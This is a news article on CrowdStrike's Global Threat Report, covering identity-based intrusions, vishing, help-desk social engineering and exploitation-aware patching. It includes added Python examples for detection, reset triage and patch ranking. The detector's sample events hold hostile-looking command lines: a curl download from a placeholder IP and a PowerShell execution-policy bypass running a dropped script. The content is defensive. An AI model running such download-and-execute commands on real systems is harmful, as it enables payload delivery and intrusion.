Threat actors increasingly using stolen credentials to compromise cloud assets, warns the company's annual threat report.

CISOs should be moving “as fast as they can” to close holes in their identity and access management infrastructure to block cyber attacks, says a CrowdStrike executive.
Adam Meyers, senior vice president of counter adversary operations, made the comment Monday on the release of CrowdStrike’s annual Global Threat Report, an analysis of 2024 data from customers.
The report noted that 79% of initial detections of attacks didn’t include malware; abusing valid accounts has become the primary initial access vector to organizations’ cloud assets, accounting for 35% of cloud incidents in the first half of 2024.
Attackers changing tactics
“Threat actors have figured out that trying to bring malware [in an initial compromise] is like going to the airport with a bottle of water in your pack — you’re probably going to get caught,” Meyers said in an interview, noting that defensive technology like endpoint detection and response [EDR] is good at catching malware. So, he said, “what is increasingly happening is threat actors are trying to move away from being detected [through EDR] and doing it with identity. This is a trend we’ve seen over the past two years or so and is really on the uptick, and is continuing to evolve.”
But, he warned, “multi-factor authentication [MFA] is not a silver bullet, and you need to have identity threat detection and response capability in your [IT] environment or sad things are going to happen.”
“It’s the old [hockey] adage,” he added. “‘Skate to where the puck is going, not to where it’s at right now.’”
Among the report’s findings:
- Breakout time — how long it takes for an adversary to start moving laterally across an IT network — reached an all-time low last year. The average fell to 48 minutes, while the fastest breakout time dropped to a mere 51 seconds;
- Voice phishing (vishing) attacks, where adversaries call victims to amplify their activities with persuasive social engineering techniques, saw explosive growth — up 442% between the first and second halves of 2024. This is part of a trend CrowdStrike sees from commodity malware operators — a shift from phishing to other tactics including callback phishing and help desk social engineering attacks;
- Attacks related to initial access boomed, accounting for 52% of vulnerabilities observed by CrowdStrike in 2024. Providing access as a service became a thriving business for threat actors, as advertisements for access brokers increased 50% year-over-year;
- Among nation-states, China-nexus activity surged 150% overall, with some targeted industries suffering 200% to 300% more attacks than the previous year;
- GenAI played a pivotal role in sophisticated cyberattack campaigns last year. It enabled a North Korean-aligned threat actor dubbed Famous Chollima to create highly convincing fake IT job candidates that infiltrated victim organizations, and it helped China-, Russia-, and Iran-affiliated threat actors conduct AI-driven disinformation and influence operations to disrupt elections.
As an example of a malware-free attack, the report outlined tactics used by a threat actor it dubs Curly Spider, which it described as “one of the fastest and most adaptive eCrime adversaries, executing high-speed, hands-on intrusions.”
After firing a large volume of spam emails impersonating charities, newsletters, or financial offers to an employee, a gang member calls the target posing as a help desk or IT support member. They claim the spam is caused by malware or outdated spam filters. The employee is told to join a remote session using a tool like Microsoft Quick Assist or TeamViewer (the gang member even helps them download the tool). That lets the attacker into the IT system to download malicious payloads using curl or PowerShell, and to establish persistence through a backdoor.
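The sequence just described leaves a recognisable trace in endpoint telemetry: a remote-assistance tool starts on a workstation, and shortly afterwards the same host runs curl or PowerShell to fetch something from the network. The following detection logic is an added example, not code from the report or from CrowdStrike; the event format, the 30-minute window, the tool names and the sample events are all assumptions constructed for the illustration.

```python
"""Hypothetical detection: remote-assist session followed by a network download.

Runs over constructed process-creation events and flags hosts where a tool
such as Microsoft Quick Assist or TeamViewer starts and, within a short window,
curl or PowerShell is used to fetch something over HTTP(S). The event layout,
window length and tool names are assumptions, not telemetry from the report.
"""
from datetime import datetime, timedelta

# Process images a user might be talked into launching (assumption).
REMOTE_ASSIST = {"quickassist.exe", "teamviewer.exe"}
# Download-capable tools named in the article; hint strings are an assumption.
DOWNLOADERS = {"curl.exe", "powershell.exe", "pwsh.exe"}
DOWNLOAD_HINTS = ("http://", "https://", "downloadstring", "downloadfile", "invoke-webrequest")

# Constructed sample events (not real telemetry): (time, host, user, image, cmdline)
EVENTS = [
    ("2024-06-03T09:02:11", "WS-17", "jdoe", "outlook.exe", "outlook.exe"),
    ("2024-06-03T09:40:05", "WS-17", "jdoe", "quickassist.exe", "quickassist.exe"),
    ("2024-06-03T09:46:30", "WS-17", "jdoe", "curl.exe",
     "curl.exe -o C:\\Users\\Public\\u.bin https://203.0.113.10/u"),
    ("2024-06-03T09:47:12", "WS-17", "jdoe", "powershell.exe",
     "powershell.exe -ep bypass -File C:\\Users\\Public\\p.ps1"),
    ("2024-06-03T11:10:00", "WS-22", "asmith", "teamviewer.exe", "teamviewer.exe"),
    # Same shape on WS-22, but 110 minutes later: outside the default window.
    ("2024-06-03T13:00:00", "WS-22", "asmith", "curl.exe", "curl.exe https://203.0.113.10/x"),
    # PowerShell with no preceding remote-assist start and no download hint.
    ("2024-06-03T14:05:00", "WS-09", "bkhan", "powershell.exe", "powershell.exe Get-Process"),
]


def find_remote_assist_downloads(events, window_minutes=30):
    """Return one alert per download that follows a remote-assist start on the same host."""
    window = timedelta(minutes=window_minutes)
    last_assist = {}  # host -> (start time, user) of the most recent remote-assist launch
    alerts = []
    for ts, host, user, image, cmdline in sorted(events, key=lambda e: e[0]):
        t = datetime.fromisoformat(ts)
        image_l = image.lower()
        if image_l in REMOTE_ASSIST:
            last_assist[host] = (t, user)
            continue
        is_download = image_l in DOWNLOADERS and any(h in cmdline.lower() for h in DOWNLOAD_HINTS)
        if not is_download:
            continue
        started = last_assist.get(host)
        if started and t - started[0] <= window:
            alerts.append({
                "host": host,
                "user": user,
                "assist_started": started[0].isoformat(),
                "download_at": t.isoformat(),
                "cmdline": cmdline,
            })
    return alerts


if __name__ == "__main__":
    for a in find_remote_assist_downloads(EVENTS):
        print(f"[ALERT] {a['host']} ({a['user']}): remote assist at {a['assist_started']}, "
              f"download at {a['download_at']}: {a['cmdline']}")
```

Correlating on the host rather than on the parent process is deliberate: the remote-assist session gives the attacker an interactive desktop, so the download need not be a child of the assistance tool. Tuning the window is the main false-positive lever; a legitimate support session that installs software will look similar, which is why the alert carries the user and command line for an analyst to confirm.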
Another common threat actor tactic is calling a targeted organization’s IT help desk pretending to be a legitimate employee, and attempting to persuade support to reset passwords and/or multi-factor authentication (MFA) for an account.
Advice for CISOs
To stop these kinds of attacks, CrowdStrike urges CISOs to require video authentication with government identification for employees who call to request self-service password resets, and to train help desk employees to be cautious when taking password and MFA reset request phone calls made outside of business hours, particularly if an unusually high number of requests is made in a short time frame or if the caller purports to be calling on behalf of a colleague.
It also helps to switch to additional, non-push-based authentication such as FIDO2 to prevent account compromise.
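The help-desk guidance above (video plus government ID before a self-service reset, extra caution outside business hours, for bursts of requests in a short period, and for callers claiming to act for a colleague) can be turned into a triage check that runs on the ticket queue. The script below is an added example, not CrowdStrike's tooling; the request fields, the business hours, the burst threshold and the sample tickets are assumptions made for the illustration.

```python
"""Hypothetical triage of phone-in password / MFA reset requests.

Decision per request: 'deny' when video + government ID verification is
missing, 'escalate' when any caution signal from the report's advice fires
(outside business hours, part of a burst, caller acting for a colleague),
otherwise 'proceed'. Field names, hours and thresholds are assumptions.
"""
from collections import deque
from datetime import datetime, timedelta

BUSINESS_HOURS = (8, 18)              # local time, assumption
BURST_LIMIT = 3                       # more than this many requests ...
BURST_WINDOW = timedelta(minutes=60)  # ... within this window is a burst (assumption)

# Constructed sample tickets (not real requests). 2024-09-10/11 are weekdays.
REQUESTS = [
    {"id": 1, "time": "2024-09-10T10:15:00", "account": "alice", "reset": "password",
     "on_behalf_of": None, "video_id_verified": True},
    {"id": 2, "time": "2024-09-10T22:40:00", "account": "bob", "reset": "mfa",
     "on_behalf_of": None, "video_id_verified": False},
    {"id": 3, "time": "2024-09-10T14:00:00", "account": "carol", "reset": "mfa",
     "on_behalf_of": "dave", "video_id_verified": True},
    # Four MFA/password resets inside 40 minutes the next morning.
    {"id": 4, "time": "2024-09-11T09:01:00", "account": "erin", "reset": "mfa",
     "on_behalf_of": None, "video_id_verified": True},
    {"id": 5, "time": "2024-09-11T09:12:00", "account": "frank", "reset": "password",
     "on_behalf_of": None, "video_id_verified": True},
    {"id": 6, "time": "2024-09-11T09:25:00", "account": "grace", "reset": "mfa",
     "on_behalf_of": None, "video_id_verified": True},
    {"id": 7, "time": "2024-09-11T09:40:00", "account": "heidi", "reset": "mfa",
     "on_behalf_of": None, "video_id_verified": True},
]


def _outside_hours(t):
    start, end = BUSINESS_HOURS
    return t.weekday() >= 5 or not (start <= t.hour < end)


def _burst_members(ordered, burst_limit, burst_window):
    """Ids of requests that sit inside any sliding window holding more than burst_limit requests."""
    recent = deque()
    members = set()
    for r in ordered:
        t = datetime.fromisoformat(r["time"])
        recent.append((t, r["id"]))
        while recent and t - recent[0][0] > burst_window:
            recent.popleft()
        if len(recent) > burst_limit:
            members.update(rid for _, rid in recent)
    return members


def triage(requests, burst_limit=BURST_LIMIT, burst_window=BURST_WINDOW):
    """Return {request id: (decision, [reasons])}."""
    ordered = sorted(requests, key=lambda r: r["time"])  # ISO strings sort chronologically
    in_burst = _burst_members(ordered, burst_limit, burst_window)
    results = {}
    for r in ordered:
        t = datetime.fromisoformat(r["time"])
        reasons = []
        if not r["video_id_verified"]:
            reasons.append("no video + government ID verification")
        if _outside_hours(t):
            reasons.append("outside business hours")
        if r["on_behalf_of"]:
            reasons.append(f"caller claims to act for {r['on_behalf_of']}")
        if r["id"] in in_burst:
            minutes = int(burst_window.total_seconds() // 60)
            reasons.append(f"part of a burst of more than {burst_limit} requests in {minutes} min")
        if not r["video_id_verified"]:
            decision = "deny"
        elif reasons:
            decision = "escalate"
        else:
            decision = "proceed"
        results[r["id"]] = (decision, reasons)
    return results


if __name__ == "__main__":
    for rid, (decision, reasons) in triage(REQUESTS).items():
        print(f"request {rid}: {decision}" + (f" ({'; '.join(reasons)})" if reasons else ""))
```

Note that the burst check is computed over the whole queue before any single ticket is decided, so the first request of a burst is escalated too, not only the one that tips the count over the limit. Identity verification is a hard gate rather than a score because, as the article stresses, a persuasive caller is the attack.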
Meyers also said that, because threat actors are increasingly exploiting unpatched vulnerabilities, CISOs need to change their patch management strategy.
Most organizations prioritize patching either by the prevalence of the vulnerability in their IT environment, or by severity using a CVSS criticality score. However, he noted, threat actors these days are chaining low-scoring vulnerabilities that they can use to create a higher criticality vulnerability.
“Think about doing your patch management based on what your adversaries are actually exploiting,” Meyers advised CISOs. A vulnerability with a score of 7 may seem high, but not if it’s hard to exploit, he said. On the other hand, a lower severity vulnerability that’s being exploited against your firm’s vertical or geographic region is more important to remediate than others.
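The prioritisation Meyers describes can be made concrete by ranking the same vulnerability list twice: once by CVSS base score alone, and once by exploitation evidence first, with chained low-scoring flaws treated at the criticality of the chain they belong to. This is an added example, not CrowdStrike's method; the record fields, the vertical and region, the placeholder ids and all sample values are constructed for the illustration and are not real vulnerabilities.

```python
"""Hypothetical exploitation-aware patch ranking (added example).

Two orderings of one constructed list: CVSS-only, and exploitation-first, where
the sort key is (observed against our vertical or region, observed in the wild,
effective score, raw score). A flaw used as a link in an observed exploit chain
takes the chain's highest CVSS as its effective score, so a low-scoring link is
not buried. Ids are placeholders, not real CVEs; field names are assumptions.
"""

OUR_VERTICAL = "finance"  # assumption
OUR_REGION = "EU"         # assumption

# Constructed sample records. 'targets' lists (vertical, region) pairs where
# exploitation was observed; 'chain' names an observed exploit chain, if any.
VULNS = [
    {"id": "VULN-A", "cvss": 7.5, "exploited": False, "targets": [], "chain": None,
     "note": "needs local auth and an unusual configuration"},
    {"id": "VULN-B", "cvss": 5.3, "exploited": True, "targets": [("finance", "EU")], "chain": None,
     "note": "seen in intrusions against EU financial firms"},
    {"id": "VULN-C", "cvss": 4.3, "exploited": True, "targets": [("retail", "US")], "chain": "chain-1",
     "note": "information leak used to bypass authentication"},
    {"id": "VULN-D", "cvss": 6.1, "exploited": True, "targets": [("retail", "US")], "chain": "chain-1",
     "note": "chained after VULN-C for code execution"},
]


def _targets_us(v):
    return any(vert == OUR_VERTICAL or reg == OUR_REGION for vert, reg in v["targets"])


def _effective_scores(vulns):
    """Raise every member of an exploit chain to the chain's highest CVSS."""
    chain_max = {}
    for v in vulns:
        if v["chain"]:
            chain_max[v["chain"]] = max(chain_max.get(v["chain"], 0.0), v["cvss"])
    return {v["id"]: max(v["cvss"], chain_max.get(v["chain"], 0.0)) for v in vulns}


def rank_by_cvss(vulns):
    """The conventional ordering: highest base score first."""
    return [v["id"] for v in sorted(vulns, key=lambda v: v["cvss"], reverse=True)]


def rank_by_exploitation(vulns):
    """Exploitation evidence first; CVSS only breaks ties within a tier."""
    effective = _effective_scores(vulns)
    key = lambda v: (_targets_us(v), v["exploited"], effective[v["id"]], v["cvss"])
    return [v["id"] for v in sorted(vulns, key=key, reverse=True)]


if __name__ == "__main__":
    print("by CVSS:        ", rank_by_cvss(VULNS))
    print("by exploitation:", rank_by_exploitation(VULNS))
```

With these inputs the 7.5 that nobody is exploiting drops from first to last, the 5.3 observed against our own vertical and region moves to the top, and the 4.3 information leak rises because it is the first link in an observed chain. The tiers are the point of the exercise; the exact weights would come from a threat intelligence feed rather than from this constructed list.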
The full report is available for download. Registration is required.